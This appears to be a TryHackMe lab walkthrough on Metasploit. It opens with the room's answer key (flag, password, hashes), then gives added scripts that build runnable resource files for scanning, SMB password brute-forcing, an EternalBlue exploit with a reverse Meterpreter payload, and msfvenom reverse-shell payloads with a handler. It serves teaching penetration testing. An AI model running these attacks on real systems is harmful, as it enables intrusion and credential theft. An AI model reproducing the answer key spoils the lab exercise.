Easy January 28, 2026

TryHackMe – Metasploit: Exploitation

Using Metasploit for scanning, vulnerability assessment and exploitation.

#cyber-security-101 #tryhackme #walkthrough

Answers

How many ports are open on the target system?

5

Using the relevant scanner, what NetBIOS name can you see?

ACME IT SUPPORT

What is running on port 8000?

webfs/1.21

What is the “penny” user’s SMB password? Use the wordlist mentioned in the previous task.

leo1234

Who wrote the module that allows us to check SMTP servers for open relay?

Campbell Murray

What is the content of the flag.txt file?

THM-5455554845

What is the NTLM hash of the password of the user “pirate”?

8ce9a3ebd1647fcc5e04025019f4b875

What is the other user’s password hash?

$6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0

Note on the two hash formats: the 32-hex-character NTLM hash is an unsalted MD4 of the UTF-16LE password as stored in the Windows SAM, so it can be used directly for pass-the-hash as well as cracked; the $6$ prefix marks a salted SHA-512 crypt hash of the kind kept in /etc/shadow on Linux, which has to be cracked offline (the salt, Sy0NNIXw, is the second field of the hash itself).

Things You Should Know

Metasploit is a penetration-testing framework used in authorized lab environments (like TryHackMe) to discover, analyse and safely test vulnerabilities in computer systems. It covers the whole testing process, from reconnaissance through controlled exploitation to payload generation, with one console (msfconsole) driving a library of modules: auxiliary modules for scanning, exploit modules, payloads, and post-exploitation modules.


1. Scanning & Enumeration

Before any exploitation, testers must understand the target system.

Port Scanning

Metasploit contains auxiliary scanner modules to find open ports and services; the basic one is auxiliary/scanner/portscan/tcp.

Common options:

  • RHOSTS – target IP(s), a range, or a file of targets (file:/path/to/targets)
  • PORTS – port range; the module default is 1-10000, so set it explicitly if higher ports matter
  • THREADS / CONCURRENCY – speed of scan: THREADS is how many hosts are scanned in parallel, CONCURRENCY how many ports are probed per host at once

Metasploit can also run Nmap directly from msfconsole (nmap, or db_nmap to store the results), which is often faster and more thorough for large scans.

Service Identification

Modules exist for specific services:

  • SMB scans (auxiliary/scanner/smb/smb_version, smb_enumshares) – reveal Windows versions, hostnames, shares.
  • UDP sweep (auxiliary/scanner/discovery/udp_sweep) – quickly find UDP services like NetBIOS or DNS; auxiliary/scanner/netbios/nbname queries the NetBIOS name directly.
  • HTTP / FTP / SSH / RDP checks (http_version, ftp_version, ssh_version, rdp_scanner) – identify common entry points and their banners.

Example Lab Findings

  • 5 open ports discovered
  • NetBIOS name identified
  • Web service running on port 8000
  • SMB credentials found using a wordlist

These steps demonstrate reconnaissance and enumeration, which are essential before any exploit attempt.
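The enumeration pass above, as an added example that is not part of the TryHackMe room or of Metasploit itself: a small shell script that writes a Metasploit resource file (.rc) containing the scanner modules just described, so the whole pass runs from one msfconsole invocation instead of being typed module by module. The script touches no network; it only writes the commands. The address 10.10.10.10 is a placeholder, not the room's target.

```shell
#!/bin/sh
# Added example (not from the TryHackMe room): build a Metasploit resource
# script (.rc) with the scanner modules discussed above, so the whole
# enumeration pass runs with one command instead of being typed line by line.
# Nothing here touches the network; the script only writes the commands.
# 10.10.10.10 is a placeholder lab address, not the room's target.

emit_enum_rc() {
    target="$1"
    cat <<EOF
# --- port scan: RHOSTS / PORTS / THREADS / CONCURRENCY ---
use auxiliary/scanner/portscan/tcp
set RHOSTS $target
# the module default is 1-10000; widen it if higher ports matter
set PORTS 1-10000
# THREADS = hosts scanned in parallel, CONCURRENCY = ports probed per host
set THREADS 10
set CONCURRENCY 20
run

# --- NetBIOS name over UDP 137 ---
use auxiliary/scanner/netbios/nbname
set RHOSTS $target
run

# --- banner of the web service on the non-standard port ---
use auxiliary/scanner/http/http_version
set RHOSTS $target
set RPORT 8000
run

# --- quick sweep of common UDP services (NetBIOS, DNS, SNMP, ...) ---
use auxiliary/scanner/discovery/udp_sweep
set RHOSTS $target
run
EOF
}

out="${TMPDIR:-/tmp}/thm-enum.rc"
emit_enum_rc "${RHOSTS:-10.10.10.10}" > "$out"
echo "wrote $out; start it with: msfconsole -q -r $out"
```

Start it with `msfconsole -q -r /tmp/thm-enum.rc` (set RHOSTS in the environment first to point it at your lab VM). The console stays open after the last module so the output can be inspected; add `exit -y` as a final line if it should return to the shell instead.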


2. Metasploit Database & Workspaces

When testing multiple systems, Metasploit’s database helps organize information.

Purpose

  • Store scan results
  • Avoid re-entering target data
  • Manage multiple projects

Key Features

  • Workspaces – separate projects or targets (workspace -a name creates and switches to one; workspace alone lists them).
  • db_nmap – runs Nmap and automatically saves results.
  • hosts / services / vulns / creds – quickly list discovered information; services -p 445 lists only the hosts with that port open.
  • hosts -R (or services -p 445 -R) – sets RHOSTS for the current module from the saved hosts, so the addresses are never retyped.

This allows testers to search for patterns, such as all machines running SMB or HTTP, and quickly focus on “low-hanging fruit” vulnerabilities.
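The database workflow, as an added example that is not part of the room or of Metasploit: a resource script that creates a workspace, scans through db_nmap, and then feeds the hosts exposing SMB straight into a scanner module with -R. It assumes msfconsole is connected to PostgreSQL (db_status must report "connected"; on Kali, msfdb init sets that up once). The workspace name acme and the address 10.10.10.10 are placeholders.

```shell
#!/bin/sh
# Added example (not from the room): the enumeration routed through the
# Metasploit database, so results are stored per workspace and hosts are fed
# back into modules with -R rather than retyped. Needs msfconsole connected to
# PostgreSQL (db_status must report "connected"; on Kali, run msfdb init once).
# acme and 10.10.10.10 are placeholder values.

emit_db_rc() {
    workspace="$1"
    target="$2"
    cat <<EOF
db_status
# one workspace per engagement keeps hosts/services from different jobs apart
workspace -a $workspace
workspace
# Nmap launched from msfconsole; every host and service found is saved
db_nmap -sV -p- $target
hosts
services
# narrow to hosts exposing SMB and push them into RHOSTS for the next module
services -p 445 -R
use auxiliary/scanner/smb/smb_version
run
# everything collected so far
vulns
creds
EOF
}

out="${TMPDIR:-/tmp}/thm-db.rc"
emit_db_rc "${WORKSPACE:-acme}" "${RHOSTS:-10.10.10.10}" > "$out"
echo "wrote $out; start it with: msfconsole -q -r $out"
```

The -R step is the point of the database: once db_nmap has populated services, the SMB scanner is pointed at exactly the hosts that matter without any address being typed, and the same filter (services -p 80 -R, services -p 8000 -R) selects the web hosts for the HTTP modules.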


3. Vulnerability Scanning

Metasploit provides scanner modules that check for known weaknesses without immediately exploiting them.

Examples:

  • SMB vulnerability checks
  • VNC login scanners
  • Service-specific authentication checks

These modules help identify easy-to-exploit issues such as weak passwords or outdated services.
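Two of the checks described above, as an added example that is not part of the room or of Metasploit: a resource script that runs the SMTP open-relay test (after printing the module's author and description with info) and a wordlist-driven login check for a single SMB user. The wordlist path is a placeholder; substitute the one the room provides. The address 10.10.10.10 is a placeholder too.

```shell
#!/bin/sh
# Added example (not from the room): an rc script with two of the checks
# described above, an SMTP open-relay test and a wordlist-driven SMB login
# check for one user. The wordlist path is a placeholder; use the one the room
# provides. 10.10.10.10 is a placeholder lab address.

emit_vulnscan_rc() {
    target="$1"
    user="$2"
    wordlist="$3"
    cat <<EOF
# read the module description and author before running an unfamiliar module
info auxiliary/scanner/smtp/smtp_relay
use auxiliary/scanner/smtp/smtp_relay
set RHOSTS $target
run

# try every password in the wordlist for one SMB user, stop at the first hit
use auxiliary/scanner/smb/smb_login
set RHOSTS $target
set SMBUser $user
set PASS_FILE $wordlist
set STOP_ON_SUCCESS true
# slow down against real targets: lockout policies count failed attempts
set BRUTEFORCE_SPEED 3
run
# successful logins are saved in the database
creds
EOF
}

out="${TMPDIR:-/tmp}/thm-vulnscan.rc"
emit_vulnscan_rc "${RHOSTS:-10.10.10.10}" "${SMBUSER:-penny}" \
    "${WORDLIST:-/path/to/wordlist.txt}" > "$out"
echo "wrote $out; start it with: msfconsole -q -r $out"
```

STOP_ON_SUCCESS and BRUTEFORCE_SPEED are the two options worth getting right: the first prevents the scanner from burning the rest of the wordlist (and the account lockout budget) after a hit, the second spaces attempts out on targets that enforce a lockout policy, which a lab VM usually does not but a production domain controller will.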


4. Exploitation

After identifying a vulnerability, Metasploit can test whether it is exploitable in a lab. Exploits are not side-effect free: a failed attempt can crash the target service, so where a module implements check, run it before exploit.

General workflow:

  1. Search for an exploit module (search type:exploit <keyword>).
  2. Select it with use.
  3. Set target options (RHOSTS, RPORT, credentials if needed) and confirm them with show options.
  4. Choose a payload (the code that runs after access is gained) and, for a reverse payload, the LHOST/LPORT it should call back to.
  5. Run check if the module supports it, then exploit (or run).

Payloads

Payloads determine what happens after access:

  • Reverse shell – target connects back to the tester; works through NAT and most outbound firewalls, but needs a listener on LHOST:LPORT before the payload runs.
  • Bind shell – tester connects to a port the payload opens on the target; only works if that inbound port is reachable.
  • Meterpreter – advanced in-memory session with many features (file transfer, hashdump, process migration, pivoting).
  • Naming: a slash before the last part (windows/meterpreter/reverse_tcp) means staged, a small stager fetches the rest from the handler; an underscore (windows/meterpreter_reverse_tcp) means stageless, everything in one file. The handler must be set to exactly the same payload name.

Sessions

Once access is gained:

  • Sessions can be listed, interacted with, renamed, or terminated.
  • Multiple sessions can run simultaneously.
  • Sessions can be backgrounded to continue scanning.
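The search/use/set/check/exploit workflow and the session commands, as an added example that is not part of the room (this page does not name the exploit used there) or of Metasploit. The module exploit/windows/smb/ms17_010_eternalblue is chosen only because it is a well-known module that implements check; swap in whatever module matches your target. The target 10.10.10.10 and attacker address 10.0.0.5 are placeholders.

```shell
#!/bin/sh
# Added example (not from the room, which does not name its exploit on this
# page): the search/use/set/check/exploit workflow as an rc script.
# exploit/windows/smb/ms17_010_eternalblue is used only because it is a
# well-known module that implements check; swap in the module for your target.
# 10.10.10.10 (target) and 10.0.0.5 (attacker) are placeholders.

emit_exploit_rc() {
    module="$1"
    target="$2"
    payload="$3"
    lhost="$4"
    lport="$5"
    cat <<EOF
# module located beforehand with: search type:exploit <keyword>
use $module
set RHOSTS $target
# reverse payload: the target calls back to LHOST:LPORT, so LHOST must be
# an address the target can reach (the VPN interface on TryHackMe)
set payload $payload
set LHOST $lhost
set LPORT $lport
show options
# ask the module whether the target looks vulnerable before firing it
check
# -z: open the session but do not drop into it, so the script continues
exploit -z
# list sessions, then interact; inside Meterpreter: getuid, sysinfo,
# hashdump, and background to return to msfconsole with the session kept
sessions -l
sessions -i 1
EOF
}

out="${TMPDIR:-/tmp}/thm-exploit.rc"
emit_exploit_rc exploit/windows/smb/ms17_010_eternalblue "${RHOSTS:-10.10.10.10}" \
    windows/x64/meterpreter/reverse_tcp "${LHOST:-10.0.0.5}" 4444 > "$out"
echo "wrote $out; start it with: msfconsole -q -r $out"
```

The order matters: check runs before exploit, and exploit -z leaves the new session in the background so the script can list it with sessions -l before interacting. Later, sessions -k <id> terminates a session and sessions -K all of them, which is the right way to end a lab so nothing is left listening.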

5. Msfvenom – Payload Generation

Msfvenom is Metasploit’s tool for creating standalone payload files in many formats and for many operating systems.

Capabilities

  • Generate payloads for Windows, Linux, Android, PHP, Python, etc.
  • Output formats: .exe, .elf, .php, .asp, raw scripts, and more.
  • Optional encoding to modify payload structure (not guaranteed to bypass security tools).

Handler (Catching the Shell)

When using reverse payloads, a listener/handler must be running before the payload executes, or the connection is simply refused. Metasploit's exploit/multi/handler module is commonly used for this; its payload, LHOST and LPORT must match the values baked into the msfvenom payload exactly, including staged versus stageless.

Typical flow:

  1. Generate payload with Msfvenom.
  2. Start a handler in Metasploit.
  3. Execute payload on the test machine.
  4. Receive shell or Meterpreter session.
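The generate/listen/execute flow, as an added example that is not part of the room or of Metasploit: the msfvenom command lines for a Windows executable, a Linux ELF and a PHP script, and a matching multi/handler resource script. The attacker address 10.0.0.5 and port 4444 are placeholders.

```shell
#!/bin/sh
# Added example (not from the room): the msfvenom command lines for three
# platforms and a matching multi/handler rc script. The payload, LHOST and
# LPORT baked into the file and the ones set on the handler must be identical.
# 10.0.0.5 is a placeholder attacker address.

venom_cmd() {
    payload="$1"; lhost="$2"; lport="$3"; fmt="$4"; outfile="$5"
    printf 'msfvenom -p %s LHOST=%s LPORT=%s -f %s -o %s\n' \
        "$payload" "$lhost" "$lport" "$fmt" "$outfile"
}

emit_handler_rc() {
    payload="$1"; lhost="$2"; lport="$3"
    cat <<EOF
use exploit/multi/handler
set payload $payload
set LHOST $lhost
set LPORT $lport
# keep listening after the first session so later callbacks are caught too
set ExitOnSession false
# -j runs the handler as a background job; the console stays free
exploit -j
EOF
}

LHOST="${LHOST:-10.0.0.5}"
LPORT="${LPORT:-4444}"

# Windows executable, Linux ELF and a PHP script, each calling back to
# LHOST:LPORT (-f raw prints the PHP source itself)
venom_cmd windows/x64/meterpreter/reverse_tcp "$LHOST" "$LPORT" exe shell.exe
venom_cmd linux/x64/shell_reverse_tcp "$LHOST" "$LPORT" elf shell.elf
venom_cmd php/meterpreter/reverse_tcp "$LHOST" "$LPORT" raw shell.php
# encoding is optional and reshapes the bytes, not the behaviour; for an x86
# payload such as windows/meterpreter/reverse_tcp: -e x86/shikata_ga_nai -i 3
# (AV products still flag the decoder stub). msfvenom --list payloads and
# msfvenom --list formats show what this build knows.

out="${TMPDIR:-/tmp}/thm-handler.rc"
emit_handler_rc windows/x64/meterpreter/reverse_tcp "$LHOST" "$LPORT" > "$out"
echo "wrote $out; start it with: msfconsole -q -r $out"
```

Run the printed msfvenom line, start the handler with msfconsole -q -r /tmp/thm-handler.rc, and only then execute the file on the test machine; sessions -l shows the callback. Each payload type needs its own handler: the Linux and PHP files above must be caught by a handler whose set payload line names their payload, on a different LPORT if the handlers run at the same time.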

Key Takeaways

  • Scanning comes first – understand the system before exploiting.
  • Database & workspaces keep projects organized.
  • Scanner modules help find weak points quickly.
  • Exploits + Payloads allow controlled testing of vulnerabilities.
  • Msfvenom + Handlers enable custom payload creation and connection handling.
  • Metasploit is designed for learning and authorized security testing, helping defenders understand real-world attack methods so they can better secure systems.

In short, Metasploit provides a complete ethical penetration-testing workflow: Discover → Organize → Analyze → Test → Access → Manage Sessions → Generate Payloads.